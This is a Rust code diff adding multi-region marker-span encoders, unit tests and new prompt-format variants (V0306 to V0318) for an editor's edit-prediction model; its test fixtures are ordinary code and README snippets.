+ new_editable: &str,
+ cursor_offset_in_new: Option<usize>,
+ cursor_marker: &str,
+ end_marker: &str,
+) -> Result<String> {
+ let marker_offsets = compute_marker_offsets(old_editable);
+ let no_edit_tag = marker_tag(nearest_marker_number(cursor_offset_in_new, &marker_offsets));
+ encode_from_old_and_new_impl(
+ old_editable,
+ new_editable,
+ cursor_offset_in_new,
+ cursor_marker,
+ end_marker,
+ &no_edit_tag,
+ &marker_offsets,
+ |block_idx| marker_tag(block_idx + 1),
+ )
+}
+
+pub fn encode_from_old_and_new_v0317(
+ old_editable: &str,
+ new_editable: &str,
+ cursor_offset_in_new: Option<usize>,
+ cursor_marker: &str,
+ end_marker: &str,
+) -> Result<String> {
+ let marker_offsets = compute_marker_offsets(old_editable);
+ let anchor_idx = cursor_block_index(cursor_offset_in_new, &marker_offsets);
+ let no_edit_tag = marker_tag_relative(0);
+ encode_from_old_and_new_impl(
+ old_editable,
+ new_editable,
+ cursor_offset_in_new,
+ cursor_marker,
+ end_marker,
+ &no_edit_tag,
+ &marker_offsets,
+ |block_idx| marker_tag_relative(block_idx as isize - anchor_idx as isize),
+ )
+}
+
+pub fn encode_from_old_and_new_v0318(
+ old_editable: &str,
+ new_editable: &str,
+ cursor_offset_in_new: Option<usize>,
+ cursor_marker: &str,
+ end_marker: &str,
+) -> Result<String> {
+ let marker_offsets = compute_marker_offsets_v0318(old_editable);
+ let no_edit_tag = marker_tag(nearest_marker_number(cursor_offset_in_new, &marker_offsets));
+ encode_from_old_and_new_impl(
+ old_editable,
+ new_editable,
+ cursor_offset_in_new,
+ cursor_marker,
+ end_marker,
+ &no_edit_tag,
+ &marker_offsets,
+ |block_idx| marker_tag(block_idx + 1),
+ )
+}
+
// Unit tests for marker-offset computation, marker-span encode/apply, and
// the V0316/V0317/V0318 roundtrips. Fixtures are byte-exact: string literals
// (including escaped quotes and tabs) must not be reformatted.
#[cfg(test)]
mod tests {
    use super::*;

    // --- compute_marker_offsets: block boundary placement ---

    #[test]
    fn test_compute_marker_offsets_small_block() {
        let text = "aaa\nbbb\nccc\n";
        let offsets = compute_marker_offsets(text);
        assert_eq!(offsets, vec![0, text.len()]);
    }

    #[test]
    fn test_compute_marker_offsets_blank_line_split() {
        let text = "aaa\nbbb\nccc\n\nddd\neee\nfff\n";
        let offsets = compute_marker_offsets(text);
        assert_eq!(offsets[0], 0);
        assert!(offsets.contains(&13), "offsets: {:?}", offsets);
        assert_eq!(*offsets.last().unwrap(), text.len());
    }

    #[test]
    fn test_compute_marker_offsets_blank_line_split_overrides_pending_hard_cap_boundary() {
        let text = "\
class OCRDataframe(BaseModel):
    model_config = ConfigDict(arbitrary_types_allowed=True)

    df: pl.DataFrame

    def page(self, page_number: int = 0) -> \"OCRDataframe\":
        # Filter dataframe on specific page
        df_page = self.df.filter(pl.col(\"page\") == page_number)
        return OCRDataframe(df=df_page)

    def get_text_cell(
        self,
        cell: Cell,
        margin: int = 0,
        page_number: Optional[int] = None,
        min_confidence: int = 50,
    ) -> Optional[str]:
        \"\"\"
        Get text corresponding to cell
";
        let offsets = compute_marker_offsets(text);

        let def_start = text
            .find("    def get_text_cell(")
            .expect("def line exists");
        let self_start = text.find("        self,").expect("self line exists");

        assert!(
            offsets.contains(&def_start),
            "expected boundary at def line start ({def_start}), got {offsets:?}"
        );
        assert!(
            !offsets.contains(&self_start),
            "did not expect boundary at self line start ({self_start}), got {offsets:?}"
        );
    }

    #[test]
    fn test_compute_marker_offsets_blank_line_split_skips_closer_line() {
        let text = "\
impl Plugin for AhoySchedulePlugin {
    fn build(&self, app: &mut App) {
        app.configure_sets(
            self.schedule,
            (
                AhoySystems::MoveCharacters,
                AhoySystems::ApplyForcesToDynamicRigidBodies,
            )
                .chain()
                .before(PhysicsSystems::First),
        );

    }
}

/// System set used by all systems of `bevy_ahoy`.
#[derive(SystemSet, Debug, Clone, Copy, Hash, PartialEq, Eq)]
pub enum AhoySystems {
    MoveCharacters,
    ApplyForcesToDynamicRigidBodies,
}
";
        let offsets = compute_marker_offsets(text);

        let closer_start = text.find("    }\n").expect("closer line exists");
        let doc_start = text
            .find("/// System set used by all systems of `bevy_ahoy`.")
            .expect("doc line exists");

        assert!(
            !offsets.contains(&closer_start),
            "did not expect boundary at closer line start ({closer_start}), got {offsets:?}"
        );
        assert!(
            offsets.contains(&doc_start),
            "expected boundary at doc line start ({doc_start}), got {offsets:?}"
        );
    }

    #[test]
    fn test_compute_marker_offsets_max_lines_split() {
        let text = "1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n";
        let offsets = compute_marker_offsets(text);
        assert!(offsets.len() >= 3, "offsets: {:?}", offsets);
    }

    #[test]
    fn test_compute_marker_offsets_hard_cap_nudges_past_closer_to_case_line() {
        let text = "a1\na2\na3\na4\na5\na6\na7\na8\n}\ncase 'x': {\nbody\n";
        let offsets = compute_marker_offsets(text);

        let expected = text.find("case 'x': {").expect("case line exists");
        assert!(
            offsets.contains(&expected),
            "expected nudged boundary at case line start ({expected}), got {offsets:?}"
        );
    }

    #[test]
    fn test_compute_marker_offsets_hard_cap_nudge_respects_max_forward_lines() {
        let text = "a1\na2\na3\na4\na5\na6\na7\na8\n}\n}\n}\n}\n}\ncase 'x': {\nbody\n";
        let offsets = compute_marker_offsets(text);

        let case_start = text.find("case 'x': {").expect("case line exists");
        assert!(
            !offsets.contains(&case_start),
            "boundary should not nudge beyond max forward lines; offsets: {offsets:?}"
        );
    }

    #[test]
    fn test_compute_marker_offsets_stay_sorted_when_hard_cap_boundary_nudges_forward() {
        let text = "\
aaaaaaaaaa = 1;
bbbbbbbbbb = 2;
cccccccccc = 3;
dddddddddd = 4;
eeeeeeeeee = 5;
ffffffffff = 6;
gggggggggg = 7;
hhhhhhhhhh = 8;
    };
  };

  grafanaDashboards = {
    cluster-overview.spec = {
      inherit instanceSelector;
      folderRef = \"infrastructure\";
      json = builtins.readFile ./grafana/dashboards/cluster-overview.json;
    };
  };
";
        let offsets = compute_marker_offsets(text);

        assert_eq!(offsets.first().copied(), Some(0), "offsets: {offsets:?}");
        assert_eq!(
            offsets.last().copied(),
            Some(text.len()),
            "offsets: {offsets:?}"
        );
        assert!(
            offsets.windows(2).all(|window| window[0] <= window[1]),
            "offsets must be sorted: {offsets:?}"
        );
    }

    #[test]
    fn test_compute_marker_offsets_empty() {
        let offsets = compute_marker_offsets("");
        assert_eq!(offsets, vec![0, 0]);
    }

    #[test]
    fn test_compute_marker_offsets_avoid_short_markdown_blocks() {
        let text = "\
# Spree Posts

This is a Posts extension for [Spree Commerce](https://spreecommerce.org), built with Ruby on Rails.

## Installation

1. Add this extension to your Gemfile with this line:

   ```ruby
   bundle add spree_posts
   ```

2. Run the install generator

   ```ruby
   bundle exec rails g spree_posts:install
   ```

3. Restart your server

   If your server was running, restart it so that it can find the assets properly.

## Developing

1. Create a dummy app

   ```bash
   bundle update
   bundle exec rake test_app
   ```

2. Add your new code
3. Run tests

   ```bash
   bundle exec rspec
   ```

When testing your applications integration with this extension you may use it's factories.
Simply add this require statement to your spec_helper:

```ruby
require 'spree_posts/factories'
```

## Releasing a new version

```shell
bundle exec gem bump -p -t
bundle exec gem release
```

For more options please see [gem-release README](https://github.com/svenfuchs/gem-release)

## Contributing

If you'd like to contribute, please take a look at the contributing guide.
";
        let offsets = compute_marker_offsets(text);

        assert_eq!(offsets.first().copied(), Some(0), "offsets: {offsets:?}");
        assert_eq!(
            offsets.last().copied(),
            Some(text.len()),
            "offsets: {offsets:?}"
        );

        for window in offsets.windows(2) {
            let block = &text[window[0]..window[1]];
            let line_count = block.lines().count();
            assert!(
                line_count >= V0316_MIN_BLOCK_LINES,
                "block too short: {line_count} lines in block {block:?} with offsets {offsets:?}"
            );
        }
    }

    // --- legacy extract/apply/encode (pre-V0316 format) ---

    #[test]
    fn test_extract_marker_span() {
        let text = "<|marker_2|>\n new content\n<|marker_3|>\n";
        let (start, end, content) = extract_marker_span(text).unwrap();
        assert_eq!(start, 2);
        assert_eq!(end, 3);
        assert_eq!(content, " new content\n");
    }

    #[test]
    fn test_extract_marker_span_multi_line() {
        let text = "<|marker_1|>\nline1\nline2\nline3\n<|marker_4|>";
        let (start, end, content) = extract_marker_span(text).unwrap();
        assert_eq!(start, 1);
        assert_eq!(end, 4);
        assert_eq!(content, "line1\nline2\nline3\n");
    }

    #[test]
    fn test_apply_marker_span_basic() {
        let old = "aaa\nbbb\nccc\n";
        let output = "<|marker_1|>\naaa\nBBB\nccc\n<|marker_2|>";
        let result = apply_marker_span(old, output).unwrap();
        assert_eq!(result, "aaa\nBBB\nccc\n");
    }

    #[test]
    fn test_apply_marker_span_preserves_trailing_blank_line() {
        let old = "/\nresult\n\n";
        let output = "<|marker_1|>\n//\nresult\n\n<|marker_2|>";
        let result = apply_marker_span(old, output).unwrap();
        assert_eq!(result, "//\nresult\n\n");
    }

    #[test]
    fn test_encode_no_edits() {
        let old = "aaa\nbbb\nccc\n";
        let result = encode_from_old_and_new(
            old,
            old,
            None,
            "<|user_cursor|>",
            ">>>>>>> UPDATED\n",
            "NO_EDITS\n",
        )
        .unwrap();
        assert_eq!(result, "NO_EDITS\n>>>>>>> UPDATED\n");
    }

    #[test]
    fn test_encode_with_change() {
        let old = "aaa\nbbb\nccc\n";
        let new = "aaa\nBBB\nccc\n";
        let result = encode_from_old_and_new(
            old,
            new,
            None,
            "<|user_cursor|>",
            ">>>>>>> UPDATED\n",
            "NO_EDITS\n",
        )
        .unwrap();
        assert!(result.contains("<|marker_1|>"));
        assert!(result.contains("<|marker_2|>"));
        assert!(result.contains("aaa\nBBB\nccc\n"));
        assert!(result.ends_with(">>>>>>> UPDATED\n"));
    }

    #[test]
    fn test_roundtrip_encode_apply() {
        let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\nline9\nline10\n";
        let new = "line1\nline2\nline3\n\nline5\nLINE6\nline7\nline8\nline9\nline10\n";
        let encoded = encode_from_old_and_new(
            old,
            new,
            None,
            "<|user_cursor|>",
            ">>>>>>> UPDATED\n",
            "NO_EDITS\n",
        )
        .unwrap();
        let output = encoded
            .strip_suffix(">>>>>>> UPDATED\n")
            .expect("should have end marker");
        let reconstructed = apply_marker_span(old, output).unwrap();
        assert_eq!(reconstructed, new);
    }

    #[test]
    fn test_extract_editable_region_from_markers_multi() {
        let text = "prefix\n<|marker_1|>\naaa\nbbb\n<|marker_2|>\nccc\nddd\n<|marker_3|>\nsuffix";
        let parsed = extract_editable_region_from_markers(text).unwrap();
        assert_eq!(parsed, "aaa\nbbb\nccc\nddd");
    }

    #[test]
    fn test_extract_editable_region_two_markers() {
        let text = "<|marker_1|>\none\ntwo three\n<|marker_2|>";
        let parsed = extract_editable_region_from_markers(text).unwrap();
        assert_eq!(parsed, "one\ntwo three");
    }

    #[test]
    fn test_encode_with_cursor() {
        let old = "aaa\nbbb\nccc\n";
        let new = "aaa\nBBB\nccc\n";
        let result = encode_from_old_and_new(
            old,
            new,
            Some(5),
            "<|user_cursor|>",
            ">>>>>>> UPDATED\n",
            "NO_EDITS\n",
        )
        .unwrap();
        assert!(result.contains("<|user_cursor|>"), "result: {result}");
        assert!(result.contains("B<|user_cursor|>BB"), "result: {result}");
    }

    #[test]
    fn test_extract_marker_span_strips_intermediate_markers() {
        let text = "<|marker_2|>\nline1\n<|marker_3|>\nline2\n<|marker_4|>";
        let (start, end, content) = extract_marker_span(text).unwrap();
        assert_eq!(start, 2);
        assert_eq!(end, 4);
        assert_eq!(content, "line1\nline2\n");
    }

    #[test]
    fn test_extract_marker_span_strips_multiple_intermediate_markers() {
        let text = "<|marker_1|>\naaa\n<|marker_2|>\nbbb\n<|marker_3|>\nccc\n<|marker_4|>";
        let (start, end, content) = extract_marker_span(text).unwrap();
        assert_eq!(start, 1);
        assert_eq!(end, 4);
        assert_eq!(content, "aaa\nbbb\nccc\n");
    }

    #[test]
    fn test_apply_marker_span_with_extra_intermediate_marker() {
        let old = "aaa\nbbb\nccc\n";
        let output = "<|marker_1|>\naaa\n<|marker_1|>\nBBB\nccc\n<|marker_2|>";
        let result = apply_marker_span(old, output).unwrap();
        assert_eq!(result, "aaa\nBBB\nccc\n");
    }

    #[test]
    fn test_strip_marker_tags_inline() {
        assert_eq!(strip_marker_tags("no markers here"), "no markers here");
        assert_eq!(strip_marker_tags("before<|marker_5|>after"), "beforeafter");
        assert_eq!(
            strip_marker_tags("line1\n<|marker_3|>\nline2"),
            "line1\nline2"
        );
    }

    // --- V0316: absolute, 1-indexed, byte-exact markers ---

    #[test]
    fn test_write_editable_with_markers_v0316_byte_exact() {
        let editable = "aaa\nbbb\nccc\n";
        let mut output = String::new();
        write_editable_with_markers_v0316(&mut output, editable, 4, "<|user_cursor|>");
        assert!(output.starts_with("<|marker_1|>"));
        assert!(output.contains("<|user_cursor|>"));
        let stripped = output.replace("<|user_cursor|>", "");
        let stripped = strip_marker_tags(&stripped);
        assert_eq!(stripped, editable);
    }

    #[test]
    fn test_apply_marker_span_v0316_basic() {
        let old = "aaa\nbbb\nccc\n";
        let output = "<|marker_1|>aaa\nBBB\nccc\n<|marker_2|>";
        let result = apply_marker_span_v0316(old, output).unwrap();
        assert_eq!(result, "aaa\nBBB\nccc\n");
    }

    #[test]
    fn test_apply_marker_span_v0316_no_edit() {
        let old = "aaa\nbbb\nccc\n";
        let output = "<|marker_1|><|marker_1|>";
        let result = apply_marker_span_v0316(old, output).unwrap();
        assert_eq!(result, old);
    }

    #[test]
    fn test_apply_marker_span_v0316_no_edit_any_marker() {
        let old = "aaa\nbbb\nccc\n";
        let output = "<|marker_2|>ignored content<|marker_2|>";
        let result = apply_marker_span_v0316(old, output).unwrap();
        assert_eq!(result, old);
    }

    #[test]
    fn test_apply_marker_span_v0316_multi_block() {
        let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\n";
        let marker_offsets = compute_marker_offsets(old);
        assert!(
            marker_offsets.len() >= 3,
            "expected at least 3 offsets, got {:?}",
            marker_offsets
        );

        let new_content = "LINE1\nLINE2\nLINE3\n\nLINE5\nLINE6\nLINE7\nLINE8\n";
        let mut output = String::new();
        output.push_str("<|marker_1|>");
        for i in 0..marker_offsets.len() - 1 {
            if i > 0 {
                output.push_str(&marker_tag(i + 1));
            }
            let start = marker_offsets[i];
            let end = marker_offsets[i + 1];
            let block_len = end - start;
            output.push_str(&new_content[start..start + block_len]);
        }
        let last_marker_num = marker_offsets.len();
        output.push_str(&marker_tag(last_marker_num));
        let result = apply_marker_span_v0316(old, &output).unwrap();
        assert_eq!(result, new_content);
    }

    #[test]
    fn test_apply_marker_span_v0316_byte_exact_no_normalization() {
        let old = "aaa\nbbb\nccc\n";
        let output = "<|marker_1|>aaa\nBBB\nccc<|marker_2|>";
        let result = apply_marker_span_v0316(old, output).unwrap();
        assert_eq!(result, "aaa\nBBB\nccc");
    }

    #[test]
    fn test_encode_v0316_no_edits() {
        let old = "aaa\nbbb\nccc\n";
        let result =
            encode_from_old_and_new_v0316(old, old, Some(5), "<|user_cursor|>", "<|end|>").unwrap();
        assert!(result.ends_with("<|end|>"));
        let stripped = result.strip_suffix("<|end|>").unwrap();
        let result_parsed = apply_marker_span_v0316(old, stripped).unwrap();
        assert_eq!(result_parsed, old);
    }

    #[test]
    fn test_encode_v0316_with_change() {
        let old = "aaa\nbbb\nccc\n";
        let new = "aaa\nBBB\nccc\n";
        let result =
            encode_from_old_and_new_v0316(old, new, None, "<|user_cursor|>", "<|end|>").unwrap();
        assert!(result.contains("<|marker_1|>"));
        assert!(result.contains("<|marker_2|>"));
        assert!(result.ends_with("<|end|>"));
    }

    #[test]
    fn test_roundtrip_v0316() {
        let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\nline9\nline10\n";
        let new = "line1\nline2\nline3\n\nline5\nLINE6\nline7\nline8\nline9\nline10\n";
        let encoded =
            encode_from_old_and_new_v0316(old, new, None, "<|user_cursor|>", "<|end|>").unwrap();
        let stripped = encoded
            .strip_suffix("<|end|>")
            .expect("should have end marker");
        let reconstructed = apply_marker_span_v0316(old, stripped).unwrap();
        assert_eq!(reconstructed, new);
    }

    #[test]
    fn test_roundtrip_v0316_with_cursor() {
        let old = "aaa\nbbb\nccc\n";
        let new = "aaa\nBBB\nccc\n";
        let result =
            encode_from_old_and_new_v0316(old, new, Some(5), "<|user_cursor|>", "<|end|>").unwrap();
        assert!(result.contains("<|user_cursor|>"), "result: {result}");
        assert!(result.contains("B<|user_cursor|>BB"), "result: {result}");
    }

    #[test]
    fn test_roundtrip_v0316_multi_block_change() {
        let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\n";
        let new = "line1\nLINE2\nline3\n\nline5\nLINE6\nline7\nline8\n";
        let encoded =
            encode_from_old_and_new_v0316(old, new, None, "<|user_cursor|>", "<|end|>").unwrap();
        let stripped = encoded
            .strip_suffix("<|end|>")
            .expect("should have end marker");
        let reconstructed = apply_marker_span_v0316(old, stripped).unwrap();
        assert_eq!(reconstructed, new);
    }

    #[test]
    fn test_nearest_marker_number() {
        let offsets = vec![0, 10, 20, 30];
        assert_eq!(nearest_marker_number(Some(0), &offsets), 1);
        assert_eq!(nearest_marker_number(Some(9), &offsets), 2);
        assert_eq!(nearest_marker_number(Some(15), &offsets), 2);
        assert_eq!(nearest_marker_number(Some(25), &offsets), 3);
        assert_eq!(nearest_marker_number(Some(30), &offsets), 4);
        assert_eq!(nearest_marker_number(None, &offsets), 1);
    }

    // --- V0317: cursor-relative marker numbering ---

    #[test]
    fn test_marker_tag_relative_formats_as_expected() {
        assert_eq!(marker_tag_relative(-2), "<|marker-2|>");
        assert_eq!(marker_tag_relative(-1), "<|marker-1|>");
        assert_eq!(marker_tag_relative(0), "<|marker-0|>");
        assert_eq!(marker_tag_relative(1), "<|marker+1|>");
        assert_eq!(marker_tag_relative(2), "<|marker+2|>");
    }

    #[test]
    fn test_write_editable_with_markers_v0317_includes_relative_markers_and_cursor() {
        let editable = "aaa\nbbb\nccc\n";
        let mut output = String::new();
        write_editable_with_markers_v0317(&mut output, editable, 4, "<|user_cursor|>");

        assert!(output.contains("<|marker-0|>"));
        assert!(output.contains("<|user_cursor|>"));

        let stripped = output.replace("<|user_cursor|>", "");
        let stripped =
            collect_relative_marker_tags(&stripped)
                .iter()
                .fold(stripped.clone(), |acc, marker| {
                    let tag = &stripped[marker.tag_start..marker.tag_end];
                    acc.replace(tag, "")
                });
        assert_eq!(stripped, editable);
    }

    #[test]
    fn test_apply_marker_span_v0317_basic() {
        let old = "aaa\nbbb\nccc\n";
        let output = "<|marker-0|>aaa\nBBB\nccc\n<|marker+1|>";
        let result = apply_marker_span_v0317(old, output, Some(0)).unwrap();
        assert_eq!(result, "aaa\nBBB\nccc\n");
    }

    #[test]
    fn test_apply_marker_span_v0317_no_edit() {
        let old = "aaa\nbbb\nccc\n";
        let output = "<|marker-0|><|marker-0|>";
        let result = apply_marker_span_v0317(old, output, Some(0)).unwrap();
        assert_eq!(result, old);
    }

    #[test]
    fn test_encode_v0317_no_edits() {
        let old = "aaa\nbbb\nccc\n";
        let result =
            encode_from_old_and_new_v0317(old, old, Some(5), "<|user_cursor|>", "<|end|>").unwrap();
        assert_eq!(result, "<|marker-0|><|marker-0|><|end|>");
    }

    #[test]
    fn test_roundtrip_v0317() {
        let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\n";
        let new = "line1\nLINE2\nline3\n\nline5\nLINE6\nline7\nline8\n";
        let cursor = Some(6);

        let encoded =
            encode_from_old_and_new_v0317(old, new, cursor, "<|user_cursor|>", "<|end|>").unwrap();
        let stripped = encoded
            .strip_suffix("<|end|>")
            .expect("should have end marker");
        let stripped = stripped.replace("<|user_cursor|>", "");
        let reconstructed = apply_marker_span_v0317(old, &stripped, cursor).unwrap();
        assert_eq!(reconstructed, new);
    }

    #[test]
    fn test_roundtrip_v0317_with_cursor_marker() {
        let old = "aaa\nbbb\nccc\n";
        let new = "aaa\nBBB\nccc\n";
        let result =
            encode_from_old_and_new_v0317(old, new, Some(5), "<|user_cursor|>", "<|end|>").unwrap();
        assert!(result.contains("<|user_cursor|>"), "result: {result}");
        assert!(result.contains("<|marker-0|>"), "result: {result}");
    }

    // --- V0318: larger block sizes, otherwise V0316 semantics ---

    #[test]
    fn test_compute_marker_offsets_v0318_uses_larger_block_sizes() {
        let text = "l1\nl2\nl3\n\nl5\nl6\nl7\nl8\nl9\nl10\nl11\nl12\nl13\n";
        let v0316_offsets = compute_marker_offsets(text);
        let v0318_offsets = compute_marker_offsets_v0318(text);

        assert!(v0318_offsets.len() < v0316_offsets.len());
        assert_eq!(v0316_offsets.first().copied(), Some(0));
        assert_eq!(v0318_offsets.first().copied(), Some(0));
        assert_eq!(v0316_offsets.last().copied(), Some(text.len()));
        assert_eq!(v0318_offsets.last().copied(), Some(text.len()));
    }

    #[test]
    fn test_roundtrip_v0318() {
        let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\nline9\nline10\n";
        let new = "line1\nline2\nline3\n\nline5\nLINE6\nline7\nline8\nline9\nline10\n";
        let encoded =
            encode_from_old_and_new_v0318(old, new, None, "<|user_cursor|>", "<|end|>").unwrap();
        let stripped = encoded
            .strip_suffix("<|end|>")
            .expect("should have end marker");
        let reconstructed = apply_marker_span_v0318(old, stripped).unwrap();
        assert_eq!(reconstructed, new);
    }

    #[test]
    fn test_roundtrip_v0318_append_at_end_of_editable_region() {
        let old = "line1\nline2\nline3\n";
        let new = "line1\nline2\nline3\nline4\n";
        let encoded =
            encode_from_old_and_new_v0318(old, new, None, "<|user_cursor|>", "<|end|>").unwrap();

        // A repeated tag would be the "no edit" sentinel and lose the append.
        assert_ne!(encoded, "<|marker_2|><|end|>");

        let stripped = encoded
            .strip_suffix("<|end|>")
            .expect("should have end marker");
        let reconstructed = apply_marker_span_v0318(old, stripped).unwrap();
        assert_eq!(reconstructed, new);
    }

    #[test]
    fn test_roundtrip_v0318_insert_at_internal_marker_boundary() {
        let old = "alpha\nbeta\n\ngamma\ndelta\n";
        let new = "alpha\nbeta\n\ninserted\ngamma\ndelta\n";
        let encoded =
            encode_from_old_and_new_v0318(old, new, None, "<|user_cursor|>", "<|end|>").unwrap();

        let stripped = encoded
            .strip_suffix("<|end|>")
            .expect("should have end marker");
        let reconstructed = apply_marker_span_v0318(old, stripped).unwrap();
        assert_eq!(reconstructed, new);
    }

    #[test]
    fn test_encode_v0317_markers_stay_on_line_boundaries() {
        let old = "\
\t\t\t\tcontinue outer;
\t\t\t}
\t\t}
\t}

\tconst intersectionObserver = new IntersectionObserver((entries) => {
\t\tfor (const entry of entries) {
\t\t\tif (entry.isIntersecting) {
\t\t\t\tintersectionObserver.unobserve(entry.target);
\t\t\t\tanchorPreload(/** @type {HTMLAnchorElement} */ (entry.target));
\t\t\t}
\t\t}
\t});

\tconst observer = new MutationObserver(() => {
\t\tconst links = /** @type {NodeListOf<HTMLAnchorElement>} */ (
\t\t\tdocument.querySelectorAll('a[data-preload]')
\t\t);

\t\tfor (const link of links) {
\t\t\tif (linkSet.has(link)) continue;
\t\t\tlinkSet.add(link);

\t\t\tswitch (link.dataset.preload) {
\t\t\t\tcase '':
\t\t\t\tcase 'true':
\t\t\t\tcase 'hover': {
\t\t\t\t\tlink.addEventListener('mouseenter', function callback() {
\t\t\t\t\t\tlink.removeEventListener('mouseenter', callback);
\t\t\t\t\t\tanchorPreload(link);
\t\t\t\t\t});
";
        let new = old.replacen(
            "\t\t\t\tcase 'true':\n",
            "\t\t\t\tcase 'TRUE':<|user_cursor|>\n",
            1,
        );

        let cursor_offset = new.find("<|user_cursor|>").expect("cursor marker in new");
        let new_without_cursor = new.replace("<|user_cursor|>", "");

        let encoded = encode_from_old_and_new_v0317(
            old,
            &new_without_cursor,
            Some(cursor_offset),
            "<|user_cursor|>",
            "<|end|>",
        )
        .unwrap();

        let core = encoded.strip_suffix("<|end|>").unwrap_or(&encoded);
        for marker in collect_relative_marker_tags(core) {
            let tag_start = marker.tag_start;
            assert!(
                tag_start == 0 || core.as_bytes()[tag_start - 1] == b'\n',
                "marker not at line boundary: {} in output:\n{}",
                marker_tag_relative(marker.value),
                core
            );
        }
    }
}
@@ -1,4 +1,5 @@
pub mod excerpt_ranges;
+pub mod multi_region;
use anyhow::{Result, anyhow};
use serde::{Deserialize, Serialize};
@@ -24,6 +25,11 @@ fn estimate_tokens(bytes: usize) -> usize {
bytes / 3
}
+/// Leave some slack to avoid overflow.
+fn apply_prompt_budget_margin(max_tokens: usize) -> usize {
+ (max_tokens as f64 * 0.9).floor() as usize
+}
+
#[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)]
pub struct ZetaPromptInput {
pub cursor_path: Arc<Path>,
@@ -81,6 +87,14 @@ pub enum ZetaFormat {
v0226Hashline,
V0304VariableEdit,
V0304SeedNoEdits,
+ /// Multi-block marker spans with NO_EDITS sentinel.
+ V0306SeedMultiRegions,
+ /// Byte-exact marker spans; all intermediate markers emitted; repeated marker means no-edit.
+ V0316SeedMultiRegions,
+ /// V0316 with larger block sizes.
+ V0318SeedMultiRegions,
+ /// V0316, but marker numbers are relative to the cursor block (e.g. -1, -0, +1).
+ V0317SeedMultiRegions,
}
impl std::fmt::Display for ZetaFormat {
@@ -202,7 +216,7 @@ pub fn prompt_input_contains_special_tokens(input: &ZetaPromptInput, format: Zet
.any(|token| input.cursor_excerpt.contains(token))
}
-pub fn format_zeta_prompt(input: &ZetaPromptInput, format: ZetaFormat) -> String {
+pub fn format_zeta_prompt(input: &ZetaPromptInput, format: ZetaFormat) -> Option<String> {
format_prompt_with_budget_for_format(input, format, MAX_PROMPT_TOKENS)
}
@@ -218,6 +232,56 @@ pub fn special_tokens_for_format(format: ZetaFormat) -> &'static [&'static str]
ZetaFormat::v0226Hashline => hashline::special_tokens(),
ZetaFormat::V0304VariableEdit => v0304_variable_edit::special_tokens(),
ZetaFormat::V0304SeedNoEdits => seed_coder::special_tokens(),
+ ZetaFormat::V0316SeedMultiRegions => {
+ static TOKENS: &[&str] = &[
+ seed_coder::FIM_SUFFIX,
+ seed_coder::FIM_PREFIX,
+ seed_coder::FIM_MIDDLE,
+ seed_coder::FILE_MARKER,
+ multi_region::V0316_END_MARKER,
+ CURSOR_MARKER,
+ multi_region::MARKER_TAG_PREFIX,
+ ];
+ TOKENS
+ }
+ ZetaFormat::V0318SeedMultiRegions => {
+ static TOKENS: &[&str] = &[
+ seed_coder::FIM_SUFFIX,
+ seed_coder::FIM_PREFIX,
+ seed_coder::FIM_MIDDLE,
+ seed_coder::FILE_MARKER,
+ multi_region::V0318_END_MARKER,
+ CURSOR_MARKER,
+ multi_region::MARKER_TAG_PREFIX,
+ ];
+ TOKENS
+ }
+ ZetaFormat::V0317SeedMultiRegions => {
+ static TOKENS: &[&str] = &[
+ seed_coder::FIM_SUFFIX,
+ seed_coder::FIM_PREFIX,
+ seed_coder::FIM_MIDDLE,
+ seed_coder::FILE_MARKER,
+ multi_region::V0317_END_MARKER,
+ CURSOR_MARKER,
+ multi_region::RELATIVE_MARKER_TAG_PREFIX,
+ ];
+ TOKENS
+ }
+ ZetaFormat::V0306SeedMultiRegions => {
+ static TOKENS: &[&str] = &[
+ seed_coder::FIM_SUFFIX,
+ seed_coder::FIM_PREFIX,
+ seed_coder::FIM_MIDDLE,
+ seed_coder::FILE_MARKER,
+ seed_coder::START_MARKER,
+ seed_coder::SEPARATOR,
+ seed_coder::END_MARKER,
+ CURSOR_MARKER,
+ multi_region::MARKER_TAG_PREFIX,
+ ];
+ TOKENS
+ }
}
}
@@ -231,6 +295,10 @@ pub fn token_limits_for_format(format: ZetaFormat) -> (usize, usize) {
| ZetaFormat::V0211Prefill
| ZetaFormat::V0211SeedCoder
| ZetaFormat::v0226Hashline
+ | ZetaFormat::V0306SeedMultiRegions
+ | ZetaFormat::V0316SeedMultiRegions
+ | ZetaFormat::V0318SeedMultiRegions
+ | ZetaFormat::V0317SeedMultiRegions
| ZetaFormat::V0304SeedNoEdits => (350, 150),
ZetaFormat::V0304VariableEdit => (1024, 0),
}
@@ -247,7 +315,11 @@ pub fn stop_tokens_for_format(format: ZetaFormat) -> &'static [&'static str] {
| ZetaFormat::V0211Prefill
| ZetaFormat::V0211SeedCoder
| ZetaFormat::V0304VariableEdit
+ | ZetaFormat::V0306SeedMultiRegions
| ZetaFormat::V0304SeedNoEdits => &[],
+ ZetaFormat::V0316SeedMultiRegions => &[multi_region::V0316_END_MARKER],
+ ZetaFormat::V0318SeedMultiRegions => &[multi_region::V0318_END_MARKER],
+ ZetaFormat::V0317SeedMultiRegions => &[multi_region::V0317_END_MARKER],
}
}
@@ -269,7 +341,11 @@ pub fn excerpt_ranges_for_format(
| ZetaFormat::V0211Prefill
| ZetaFormat::V0211SeedCoder
| ZetaFormat::v0226Hashline
- | ZetaFormat::V0304SeedNoEdits => (
+ | ZetaFormat::V0304SeedNoEdits
+ | ZetaFormat::V0306SeedMultiRegions
+ | ZetaFormat::V0316SeedMultiRegions
+ | ZetaFormat::V0318SeedMultiRegions
+ | ZetaFormat::V0317SeedMultiRegions => (
ranges.editable_350.clone(),
ranges.editable_350_context_150.clone(),
),
@@ -344,7 +420,149 @@ pub fn write_cursor_excerpt_section_for_format(
ZetaFormat::V0304VariableEdit => {
v0304_variable_edit::write_cursor_excerpt_section(prompt, path, context, cursor_offset)
}
+ ZetaFormat::V0306SeedMultiRegions => {
+ prompt.push_str(&build_v0306_cursor_prefix(
+ path,
+ context,
+ editable_range,
+ cursor_offset,
+ ));
+ }
+ ZetaFormat::V0316SeedMultiRegions => {
+ prompt.push_str(&build_v0316_cursor_prefix(
+ path,
+ context,
+ editable_range,
+ cursor_offset,
+ ));
+ }
